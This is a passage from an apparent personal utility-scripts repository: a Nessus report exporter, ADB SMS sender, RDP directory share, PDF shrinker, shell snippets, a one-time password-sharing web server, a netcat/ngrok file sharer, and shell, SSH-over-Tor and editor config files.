-eq 0 ]] ; then 134 | gunzip -q --synchronous $TMPDIR/folders.gz 135 | else 136 | mv $TMPDIR/folders.gz $TMPDIR/folders 137 | fi 138 | 139 | echo 140 | 141 | cat $TMPDIR/folders | jq -M -S -c '.folders[] | {name, id}' | jq -M -s 'sort_by(.name)' | grep -Ev '\[|\]|{|}' | cut -d':' -f2 | sed -z 's/,\n//g' | column 142 | rm -f $TMPDIR/folders 143 | 144 | echo 145 | elif [[ "$#" -eq 1 ]] ; then 146 | FOLDERID=$1 147 | 148 | curl -s -k -X $"GET" \ 149 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Connection: close" \ 150 | $"https://${HOSTADDR}:${HOSTPORT}/scans?folder_id=${FOLDERID}" -o $TMPDIR/scans.gz 151 | 152 | gzip -t $TMPDIR/scans.gz 2> /dev/null 153 | 154 | if [[ $? -eq 0 ]] ; then 155 | gunzip -q --synchronous $TMPDIR/scans.gz 156 | else 157 | mv $TMPDIR/scans.gz $TMPDIR/scans 158 | fi 159 | 160 | rm -rf ${REPORTSDIR} 161 | mkdir -p ${REPORTSDIR} 162 | 163 | echo " Folder ID: ${FOLDERID}" 164 | echo " Temp files dir: ${TMPDIR}" 165 | echo " Reports dir: ${REPORTSDIR}" 166 | echo " Sleep time: ${SLEEPSEC} seconds" 167 | echo 168 | 169 | for SCANID in $(cat $TMPDIR/scans | jq -M ".scans" | grep -F '"id":' | awk '{ print $NF }' | tr -d ',' | sort -h) ; do 170 | ### TODO: test for old versions 171 | #curl -s -k -X $"POST" \ 172 | #-H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Content-Length: 19" -H $"Connection: close" \ 173 | #--data-binary $'{\"format\":\"nessus\"}' \ 174 | #$"https://${HOSTADDR}:${HOSTPORT}/scans/${SCANID}/export" -o $TMPDIR/$SCANID.json 175 | 176 | curl -s -k -X $"POST" \ 177 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Content-Length: 19" -H $"Connection: close" \ 178 | --data-binary $'{\"format\":\"nessus\"}' \ 179 | $"https://${HOSTADDR}:${HOSTPORT}/scans/${SCANID}/export?limit=2500" -o $TMPDIR/$SCANID.json 180 | 181 | TOKEN=$(cat $TMPDIR/$SCANID.json | jsonlint -f | grep -F '"token"' | awk '{ print $NF }' | tr -d '"') 182 | 183 | if [[ ! -z "$TOKEN" ]] ; then 184 | echo -n "Scan ID: ${SCANID} (token: ${TOKEN}) ... 
" 185 | 186 | sleep $SLEEPSEC 187 | 188 | ### TODO: test for old versions 189 | #curl -s -k -X $"GET" \ 190 | #-H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Connection: close" -H $"Upgrade-Insecure-Requests: 1" \ 191 | #$"https://${HOSTADDR}:${HOSTPORT}/scans/exports/${TOKEN}/download" -o ${REPORTSDIR}/report_${SCANID}.gz 192 | 193 | curl -s -k -X $"GET" \ 194 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Connection: close" -H $"Upgrade-Insecure-Requests: 1" \ 195 | $"https://${HOSTADDR}:${HOSTPORT}/tokens/${TOKEN}/download" -o ${REPORTSDIR}/report_${SCANID}.gz 196 | 197 | gzip -t ${REPORTSDIR}/report_${SCANID}.gz 2> /dev/null 198 | 199 | if [[ $? -eq 0 ]] ; then 200 | gunzip -q --synchronous ${REPORTSDIR}/report_${SCANID}.gz 201 | 202 | mv ${REPORTSDIR}/report_${SCANID} ${REPORTSDIR}/report_${SCANID}.nessus 203 | else 204 | mv ${REPORTSDIR}/report_${SCANID}.gz ${REPORTSDIR}/report_${SCANID}.nessus 205 | fi 206 | 207 | echo "OK" 208 | fi 209 | done 210 | 211 | COUNT=$(ls -la ${REPORTSDIR}/*.nessus 2> /dev/null | wc -l) 212 | 213 | if [[ $COUNT -eq 0 ]] ; then 214 | echo "The folder seems to be empty, so no reports have been exported." 215 | else 216 | echo 217 | echo "${COUNT} reports have been saved." 218 | fi 219 | 220 | echo 221 | 222 | rm -f $TMPDIR/scans 223 | rm -f $TMPDIR/*.json 224 | fi 225 | 226 | -------------------------------------------------------------------------------- /Utilities/send_sms.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: send_sms.sh 6 | # 7 | # Description: A script that sends a SMS from an Android device connected via 8 | # USB to your PC. It needs ADB to work, and "Developer options" 9 | # must be enabled on your phone. 10 | # 11 | # Usage: ./send_sms.sh '' 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | NUMBER=$1 24 | MESSAGE=$2 25 | 26 | 27 | # FUNCTIONS -------------------------------------------------------------------- 28 | 29 | command_exists() { 30 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! 
Command not found: $1" 1>&2 ; exit 1 ; } 31 | } 32 | 33 | 34 | # CHECKS ----------------------------------------------------------------------- 35 | 36 | declare -a CMDS=( 37 | "adb" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | 45 | # MAIN ------------------------------------------------------------------------- 46 | 47 | adb shell service call isms 7 i32 0 s16 "com.android.mms.service" s16 "\"${NUMBER}\"" s16 "null" s16 "\"${MESSAGE}\"" s16 "null" s16 "null" 48 | 49 | -------------------------------------------------------------------------------- /Utilities/share_dir_via_rdp.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: share_dir_via_rdp.sh 6 | # 7 | # Description: A script that maps and shares a local directory to a remote 8 | # Windows machine via RDP. 9 | # 10 | # Usage: ./share_dir_via_rdp.sh [] 11 | # 12 | # 13 | # --TODO-- 14 | # - Handle parameters from command line 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | LOCAL_DIR=$1 24 | RDP_SERVER=$2 25 | SCRN_RES=$3 26 | THIS=$(basename "$0") 27 | 28 | 29 | # FUNCTIONS -------------------------------------------------------------------- 30 | 31 | command_exists() { 32 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 33 | } 34 | 35 | 36 | # CHECKS ----------------------------------------------------------------------- 37 | 38 | declare -a CMDS=( 39 | "rdesktop" 40 | ); 41 | 42 | for CMD in ${CMDS[@]} ; do 43 | command_exists $CMD 44 | done 45 | 46 | 47 | # MAIN ------------------------------------------------------------------------- 48 | 49 | if (( $# < 2 )) ; then 50 | echo "Usage: $THIS []" 51 | echo 52 | echo " - Local directory to share on remote machine" 53 | echo " - Remote RDP target machine" 54 | 55 | exit 1 56 | fi 57 | 58 | rdesktop -r disk:share="${LOCAL_DIR}" -g "${SCRN_RES}" "${RDP_SERVER}" 59 | 60 | -------------------------------------------------------------------------------- /Utilities/shrinkpdf.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # http://www.alfredklomp.com/programming/shrinkpdf 4 | # Licensed under the 3-clause BSD license: 5 | # 6 | # Copyright (c) 2014-2019, Alfred Klomp 7 | # All rights reserved. 8 | # 9 | # Redistribution and use in source and binary forms, with or without 10 | # modification, are permitted provided that the following conditions are met: 11 | # 1. Redistributions of source code must retain the above copyright notice, 12 | # this list of conditions and the following disclaimer. 13 | # 2. Redistributions in binary form must reproduce the above copyright notice, 14 | # this list of conditions and the following disclaimer in the documentation 15 | # and/or other materials provided with the distribution. 16 | # 3. Neither the name of the copyright holder nor the names of its contributors 17 | # may be used to endorse or promote products derived from this software 18 | # without specific prior written permission. 
19 | # 20 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 23 | # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 24 | # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 25 | # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 26 | # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 27 | # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 28 | # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 29 | # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 30 | # POSSIBILITY OF SUCH DAMAGE. 31 | 32 | # 33 | # Modified by Vivek Gite to suit my needs 34 | # 35 | shrink () 36 | { 37 | gs \ 38 | -q -dNOPAUSE -dBATCH -dSAFER \ 39 | -sDEVICE=pdfwrite \ 40 | -dCompatibilityLevel=1.3 \ 41 | -dPDFSETTINGS=/screen \ 42 | -dEmbedAllFonts=true \ 43 | -dSubsetFonts=true \ 44 | -dAutoRotatePages=/None \ 45 | -dColorImageDownsampleType=/Bicubic \ 46 | -dColorImageResolution=$3 \ 47 | -dGrayImageDownsampleType=/Bicubic \ 48 | -dGrayImageResolution=$3 \ 49 | -dMonoImageDownsampleType=/Subsample \ 50 | -dMonoImageResolution=$3 \ 51 | -sOutputFile="$2" \ 52 | "$1" 53 | } 54 | 55 | check_smaller () 56 | { 57 | # If $1 and $2 are regular files, we can compare file sizes to 58 | # see if we succeeded in shrinking. If not, we copy $1 over $2: 59 | if [ ! -f "$1" -o ! -f "$2" ]; then 60 | return 0; 61 | fi 62 | ISIZE="$(echo $(wc -c "$1") | cut -f1 -d\ )" 63 | OSIZE="$(echo $(wc -c "$2") | cut -f1 -d\ )" 64 | if [ "$ISIZE" -lt "$OSIZE" ]; then 65 | echo "Input smaller than output, doing straight copy" >&2 66 | cp "$1" "$2" 67 | fi 68 | } 69 | 70 | usage () 71 | { 72 | echo "Reduces PDF filesize by lossy recompressing with Ghostscript." 73 | echo "Not guaranteed to succeed, but usually works." 74 | echo " Usage: $1 infile [outfile] [resolution_in_dpi]" 75 | } 76 | 77 | IFILE="$1" 78 | 79 | # Need an input file: 80 | if [ -z "$IFILE" ]; then 81 | usage "$0" 82 | exit 1 83 | fi 84 | 85 | # Output filename defaults to "-" (stdout) unless given: 86 | if [ ! -z "$2" ]; then 87 | OFILE="$2" 88 | else 89 | OFILE="-" 90 | fi 91 | 92 | # Output resolution defaults to 72 unless given: 93 | if [ ! -z "$3" ]; then 94 | res="$3" 95 | else 96 | res="90" 97 | fi 98 | 99 | shrink "$IFILE" "$OFILE" "$res" || exit $? 
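# check_smaller() falls back to copying the input over the output if the recompressed PDF turned out larger than the original.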
100 | 101 | check_smaller "$IFILE" "$OFILE" 102 | -------------------------------------------------------------------------------- /Utilities/snippets.txt: -------------------------------------------------------------------------------- 1 | # remove all binary non-printable characters from a text file 2 | tr -dc '[:print:]\n\r' < in.file > out.file 3 | 4 | 5 | 6 | # URL-encode any string very quickly 7 | echo 'https://duckduckgo.com/?q=url+encode&t=h_&ia=web' | jq -sRr @uri 8 | 9 | 10 | 11 | # URL-decode any string very quickly 12 | alias urldecode='sed "s@+@ @g;s@%@\\\\x@g" | xargs -0 printf "%b"' 13 | echo 'https%3A%2F%2Fduckduckgo.com%2F%3Fq%3Durl%2Bencode%26t%3Dh_%26ia%3Dweb%0A' | urldecode 14 | 15 | 16 | 17 | # extract files from binary file with BinWalk 18 | binwalk -I -k -z -M -e -v file.bin 19 | 20 | 21 | 22 | # convert a TXT file to a PDF file 23 | vim example.txt -c "hardcopy > example.ps | q" ; ps2pdf example.ps 24 | 25 | 26 | 27 | # read complete lines with spaces in a loop from a text file 28 | while read STR ; do echo "$STR" ; done < example.txt 29 | 30 | 31 | 32 | # search strings with an exact numbers of characters only (eg: hashes) 33 | cat example.txt | grep -E '^.{32}$' 34 | 35 | 36 | 37 | # print a text line until a specific word is found (that word is excluded from the output) 38 | STR='Lorem Ipsum is simply dummy text of the printing and typesetting industry.' 39 | echo ${STR%%"and"*} 40 | Lorem Ipsum is simply dummy text of the printing 41 | 42 | 43 | 44 | # run Google Chrome with a specific SOCKS5 proxy server 45 | google-chrome-stable --proxy-server="socks5://127.0.0.1:3128" --host-resolver-rules="MAP * ~NOTFOUND , EXCLUDE 127.0.0.1" 46 | -------------------------------------------------------------------------------- /Utilities/xfce4-root-terminal.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Since XFCE Terminal doesn't support profiles like Gnome Terminal, this is a simple workaround to start a root terminal. 4 | 5 | xhost si:localuser:root 6 | pkexec --user root xfce4-terminal --disable-server --display=:0.0 7 | -------------------------------------------------------------------------------- /Web/SharePwd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # 4 | # SharePwd.py 5 | # ----------- 6 | # A simple Python script that, given a customer name and password, runs a 7 | # minimal web server that serves a unique URL consisting in a page with the 8 | # given password. 9 | # This may be useful when somebody needs to share a password with someone else. 10 | # As soon as the recipient reads the password, you can kill the process (or the 11 | # process kills itself if the user clicks on "OK, I've read the password"). 12 | # This is not intended to be a SECURE way to share passwords, it just aims to be 13 | # fast and straightforward. 
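# Example invocation (hypothetical customer name and password): ./SharePwd.py 'ACME Corp' 'S3cr3t-P4ss!'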
14 | # 15 | # Coded by: Riccardo Mollo (riccardomollo84@gmail.com) 16 | # 17 | 18 | import binascii 19 | import hashlib 20 | import html 21 | import http.server 22 | import random 23 | import requests 24 | import secrets 25 | import socketserver 26 | import sys 27 | 28 | from datetime import datetime 29 | from http.server import BaseHTTPRequestHandler, HTTPServer 30 | from random import randint, seed 31 | 32 | class HTTPHandler(BaseHTTPRequestHandler): 33 | def __init__(self, password, pwd_hash): 34 | self.password = password 35 | self.pwd_hash = pwd_hash 36 | 37 | def __call__(self, *args): 38 | super().__init__(*args) 39 | 40 | def do_GET(self): 41 | if (self.path[1:] == self.pwd_hash): 42 | data = get_data(self.password) 43 | 44 | self.send_response(200) 45 | self.send_header('Content-type', 'text/html') 46 | self.end_headers() 47 | self.wfile.write(data.encode()) 48 | elif (self.path[1:] == self.pwd_hash + '?ivereadthepwd=OK%2C+I%27ve+read+the+password'): 49 | self.send_response(200) 50 | self.send_header('Content-type', 'text/html') 51 | self.end_headers() 52 | self.wfile.write('Goodbye!'.encode()) 53 | 54 | print('Customer read the password.') 55 | 56 | exit(0) 57 | 58 | return 59 | 60 | def get_data(password): 61 | data = """ 62 | 63 | 64 | 65 | 66 | 105 | 106 | 107 |
""" + html.escape(password) + """
108 |
109 | 110 |
111 | 112 | 113 | """ 114 | 115 | return data 116 | 117 | def get_hash(password, salt): 118 | if type(salt) is not bytes: 119 | salt = salt.encode('utf-8') 120 | 121 | hmac = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 10000) 122 | pwd_hash = binascii.hexlify(hmac) 123 | 124 | return pwd_hash.decode() 125 | 126 | def main(argv): 127 | now = int(datetime.utcnow().timestamp()) 128 | secret = secrets.SystemRandom() 129 | port = secret.randint(16383, 65535) 130 | customer = argv[0] 131 | password = argv[1] 132 | salt = str(secret.randint(port, port * now)) 133 | pwd_hash = get_hash(password, salt) 134 | 135 | try: 136 | handler = HTTPHandler(password, pwd_hash) 137 | httpd = HTTPServer(('', port), handler) 138 | 139 | public_ip = requests.get('https://checkip.amazonaws.com').text.strip() 140 | url = 'http://' + public_ip + ':' + str(port) + '/' + pwd_hash 141 | 142 | print('Customer: ' + customer) 143 | print('Address: ' + url) 144 | 145 | httpd.serve_forever() 146 | except KeyboardInterrupt: 147 | pass 148 | except OSError as ex: 149 | print(ex) 150 | 151 | if __name__ == '__main__': 152 | if len(sys.argv) == 3: 153 | main(sys.argv[1:]) 154 | else: 155 | print("Usage: ./sharepwd.py ", file = sys.stderr) 156 | exit(1) 157 | -------------------------------------------------------------------------------- /Web/extract_links.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: extract_links.sh 6 | # 7 | # Description: A script that extracts all the web links from the HTML page 8 | # source of a given website. 9 | # 10 | # Usage: ./extract_links.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | URL=$1 23 | HTML=/tmp/.page.$RANDOM.html 24 | 25 | # FUNCTIONS -------------------------------------------------------------------- 26 | 27 | command_exists() { 28 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 29 | } 30 | 31 | 32 | # CHECKS ----------------------------------------------------------------------- 33 | 34 | declare -a CMDS=( 35 | "curl" 36 | "lynx" 37 | ); 38 | 39 | for CMD in ${CMDS[@]} ; do 40 | command_exists $CMD 41 | done 42 | 43 | 44 | # MAIN ------------------------------------------------------------------------- 45 | 46 | if [[ -z "${URL}" ]] ; then 47 | echo "Error! not specified." 48 | 49 | exit 1 50 | fi 51 | 52 | curl -s -k ${URL} -o ${HTML} 53 | lynx -dump -hiddenlinks=listonly ${HTML} | grep -vF 'file://' | grep "^\ .[0-9]*\.\ http" | awk '{ print $2 }' | sort -u 54 | rm -f ${HTML} 55 | 56 | -------------------------------------------------------------------------------- /Web/share_file.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: share_file.sh 6 | # 7 | # Description: A script that lets a user share just *one* specific file to 8 | # somebody else by just sending him a simple URL. 9 | # No path/subdirectory is present in the URL, so the file name is 10 | # never mentioned. However, when the recipient will download the 11 | # file, it will be saved with its original name. 12 | # This tool makes use of NGROK (https://ngrok.com/). 
13 | # 14 | # NOTE: please remember to kill the "nc" and "ngrok" processes as 15 | # soon as the file has been downloaded. 16 | # 17 | # Usage: ./share_file.sh 18 | # 19 | # 20 | # --TODO-- 21 | # - handle processes' kills when the file is downloaded 22 | # 23 | # 24 | ################################################################################ 25 | 26 | 27 | # VARIABLES -------------------------------------------------------------------- 28 | 29 | PORT=31337 # port on localhost that NetCat will bind to 30 | WAIT=3 # seconds to wait before asking NGROK the public URL 31 | 32 | 33 | # FUNCTIONS -------------------------------------------------------------------- 34 | 35 | command_exists() { 36 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 37 | } 38 | 39 | 40 | # CHECKS ----------------------------------------------------------------------- 41 | 42 | declare -a CMDS=( 43 | "curl" 44 | "jq" 45 | "nc" 46 | "ngrok" 47 | ); 48 | 49 | for CMD in ${CMDS[@]} ; do 50 | command_exists $CMD 51 | done 52 | 53 | 54 | # MAIN ------------------------------------------------------------------------- 55 | 56 | 57 | if [[ $# -ne 1 ]] ; then 58 | echo "Usage: ./share_file.sh " 59 | 60 | exit 1 61 | fi 62 | 63 | FILE=$1 64 | 65 | if [[ ! -f ${FILE} ]] ; then 66 | echo "Error! File not found: ${FILE}" 67 | 68 | exit 1 69 | fi 70 | 71 | CDFN=$(basename ${FILE}) 72 | SIZE=$(wc -c ${FILE} | awk '{ print $1 }') 73 | bold='\033[1m' 74 | normal='\033[0m' 75 | 76 | echo "Sharing file \"${FILE}\" (size in bytes: ${SIZE})..." 77 | 78 | { echo -ne "HTTP/1.0 200 OK\r\nContent-Disposition: attachment; filename=\"${CDFN}\"\r\nContent-Length: ${SIZE}\r\n\r\n"; cat ${FILE}; } | nc -n -l ${PORT} >/dev/null 2>&1 & 79 | 80 | echo "Launching NGROK for \"http://127.0.0.1:${PORT}/\"..." 81 | 82 | nohup ngrok http "http://127.0.0.1:${PORT}/" >/dev/null 2>&1 & 83 | sleep ${WAIT} 84 | 85 | PURL=$(curl --silent http://127.0.0.1:4040/api/tunnels | jq -r --unbuffered '.tunnels[0].public_url') 86 | 87 | echo 88 | echo -e "**** Public URL: ${bold}${PURL}${normal} ****" 89 | echo 90 | echo "Now you can download \"${CDFN}\" with a browser or with one of the following commands:" 91 | echo "$ wget --content-disposition ${PURL}" 92 | echo "$ curl -JLO ${PURL}" 93 | echo -------------------------------------------------------------------------------- /config_files/.bashrc: -------------------------------------------------------------------------------- 1 | # Source global definitions 2 | if [ -f /etc/bashrc ]; then 3 | . 
/etc/bashrc 4 | fi 5 | 6 | # enable color support of ls and also add handy aliases 7 | if [ -x /usr/bin/dircolors ]; then 8 | test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)" 9 | 10 | alias ls='ls --color=auto' 11 | #alias dir='dir --color=auto' 12 | #alias vdir='vdir --color=auto' 13 | alias grep='grep --color=auto -T' 14 | #alias fgrep='fgrep --color=auto' 15 | #alias egrep='egrep --color=auto' 16 | fi 17 | 18 | # some more ls aliases 19 | alias ll='ls -l' 20 | alias la='ls -A' 21 | alias l='ls -CF' 22 | alias lsd="ls -ad */" 23 | alias du="du --apparent-size" 24 | 25 | ################################################################################ 26 | 27 | ### function to upload files via transfer.sh 28 | transfer() { 29 | curl --progress-bar --upload-file "$1" https://transfer.sh/$(basename "$1") | tee /dev/null; 30 | #wget -t 1 -qO - --method=PUT --body-file="$1" --header="Content-Type: $(file -b --mime-type "$1")" https://transfer.sh/$(basename "$1"); 31 | echo 32 | } 33 | 34 | #### custom settings 35 | export HISTTIMEFORMAT='%F %T ' 36 | export PAGER=less 37 | export QT_QPA_PLATFORMTHEME=gtk2 38 | 39 | #### custom aliases 40 | alias dmesg="dmesg --color" 41 | alias bd=". bd -si" 42 | alias vi="nvim" 43 | alias vim="nvim" 44 | alias lx="exa -bghHaliS" 45 | alias date="date +'%a %d %h %Y %T'" 46 | alias transfer=transfer 47 | 48 | ### custom FireFox profiles 49 | alias firefox_burpsuite="firefox -P 'BurpSuite'" 50 | alias firefox_tor="firefox -P 'Tor'" 51 | 52 | ### custom library paths 53 | export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/oracle/instantclient 54 | 55 | ### custom binary paths 56 | export GOPATH=~/go 57 | export CARGOPATH=~/.cargo 58 | export ORACLEPATH=$LD_LIBRARY_PATH:/opt/mssql-tools/bin 59 | export PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:${ORACLEPATH}:${GOPATH}/bin:${CARGOPATH}/bin: 60 | 61 | ### only load LiquidPrompt in interactive shells, not from a script or from scp 62 | echo $- | grep -q i 2>/dev/null && . 
/usr/share/liquidprompt/liquidprompt 63 | -------------------------------------------------------------------------------- /config_files/.bashrc_freebsd: -------------------------------------------------------------------------------- 1 | alias grep='grep --color=auto' 2 | alias ls='ls --color' 3 | alias ll='ls -l' 4 | alias la='ls -A' 5 | alias l='ls -CF' 6 | alias du='du -A' 7 | alias free='freecolor -t -m -o' 8 | alias watch='gnu-watch' 9 | 10 | export HISTTIMEFORMAT='%F %T ' 11 | export PAGER=less 12 | export LC_ALL=en_US.UTF-8 13 | export LANG=en_US.UTF-8 14 | 15 | [[ $PS1 && -f /usr/local/share/bash-completion/bash_completion.sh ]] && source /usr/local/share/bash-completion/bash_completion.sh 16 | 17 | [[ $- = *i* ]] && source /usr/local/src/GIT/liquidprompt/liquidprompt 18 | -------------------------------------------------------------------------------- /config_files/.config/sublime-text-3/Packages/User/Preferences.sublime-settings: -------------------------------------------------------------------------------- 1 | { 2 | "color_scheme": "Packages/Color Scheme - Default/Monokai.sublime-color-scheme", 3 | "font_size": 8, 4 | "theme": "Default.sublime-theme", 5 | "translate_tabs_to_spaces": true 6 | } 7 | -------------------------------------------------------------------------------- /config_files/.gcm/gcm.conf: -------------------------------------------------------------------------------- 1 | [options] 2 | word-separators = -A-Za-z0-9,./?%&#:_=+@~ 3 | buffer-lines = 50000 4 | startup-local = False 5 | confirm-exit = True 6 | font-color = 7 | back-color = 8 | transparency = 0 9 | paste-right-click = True 10 | confirm-close-tab = False 11 | check-updates = True 12 | font = monospace 13 | donate = True 14 | auto-copy-selection = False 15 | log-path = /home/user 16 | version = 1 17 | auto-close-tab = 0 18 | 19 | [window] 20 | collapsed-folders = 21 | left-panel-width = 229 22 | window-width = 1920 23 | window-height = 1047 24 | show-panel = True 25 | show-toolbar = True 26 | 27 | [shortcuts] 28 | console_next = CTRL+SHIFT+RIGHT 29 | console_2 = F2 30 | console_3 = F3 31 | console_4 = F4 32 | console_5 = F5 33 | find = CTRL+F 34 | console_1 = F1 35 | console_8 = F8 36 | console_9 = F9 37 | console_7 = F7 38 | reset = CTRL+SHIFT+U 39 | console_close = CTRL+SHIFT+W 40 | paste = CTRL+SHIFT+V 41 | console_reconnect = CTRL+N 42 | console_6 = F6 43 | save = CTRL+S 44 | console_previous = CTRL+SHIFT+LEFT 45 | copy = CTRL+SHIFT+C 46 | copy_all = CTRL+SHIFT+A 47 | connect = CTRL+RETURN 48 | find_back = SHIFT+F3 49 | -------------------------------------------------------------------------------- /config_files/.nanorc: -------------------------------------------------------------------------------- 1 | set smooth 2 | set autoindent 3 | set casesensitive 4 | set historylog 5 | set morespace 6 | set nohelp 7 | set nowrap 8 | set tabsize 4 9 | set tabstospaces 10 | set mouse 11 | 12 | include "/usr/share/nano/nanorc.nanorc" 13 | include "/usr/share/nano/c.nanorc" 14 | include "/usr/share/nano/html.nanorc" 15 | include "/usr/share/nano/tex.nanorc" 16 | include "/usr/share/nano/mutt.nanorc" 17 | include "/usr/share/nano/patch.nanorc" 18 | include "/usr/share/nano/man.nanorc" 19 | include "/usr/share/nano/groff.nanorc" 20 | include "/usr/share/nano/perl.nanorc" 21 | include "/usr/share/nano/python.nanorc" 22 | include "/usr/share/nano/ruby.nanorc" 23 | include "/usr/share/nano/java.nanorc" 24 | include "/usr/share/nano/asm.nanorc" 25 | include "/usr/share/nano/sh.nanorc" 26 | include 
"/usr/share/nano/pov.nanorc" 27 | -------------------------------------------------------------------------------- /config_files/.ssh/config: -------------------------------------------------------------------------------- 1 | # Config file to use SSH via TOR for a specific connection 2 | # 3 | # Alternative: 4 | # torify ssh username@example.com 5 | 6 | Host exampleserver 7 | HostName example.com 8 | User username 9 | CheckHostIP no 10 | Compression yes 11 | Protocol 2 12 | ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p 13 | -------------------------------------------------------------------------------- /config_files/.tmux.conf: -------------------------------------------------------------------------------- 1 | set -g mouse on 2 | set -g mouse-select-window on 3 | set -g mouse-select-pane on 4 | set -g mouse-resize-pane on 5 | setw -g mouse on 6 | -------------------------------------------------------------------------------- /config_files/.vimrc: -------------------------------------------------------------------------------- 1 | syntax on 2 | colorscheme delek 3 | set colorcolumn=80 4 | set guicursor=n-v-c:block-Cursor/lCursor-blinkon0,i-ci:ver25-Cursor/lCursor,r-cr:hor20-Cursor/lCursor 5 | autocmd! bufwritepost .vimrc source % 6 | set number 7 | set ruler 8 | set modelines=0 9 | set encoding=utf-8 10 | -------------------------------------------------------------------------------- /config_files/.xinitrc: -------------------------------------------------------------------------------- 1 | # make QT5 apps have a GTK look (useful when using MATE or GNOME Shell) 2 | export QT_QPA_PLATFORMTHEME=gtk2 3 | -------------------------------------------------------------------------------- /config_files/.xprofile: -------------------------------------------------------------------------------- 1 | if [ -x /usr/bin/numlockx ] ; then 2 | /usr/bin/numlockx on 3 | fi 4 | --------------------------------------------------------------------------------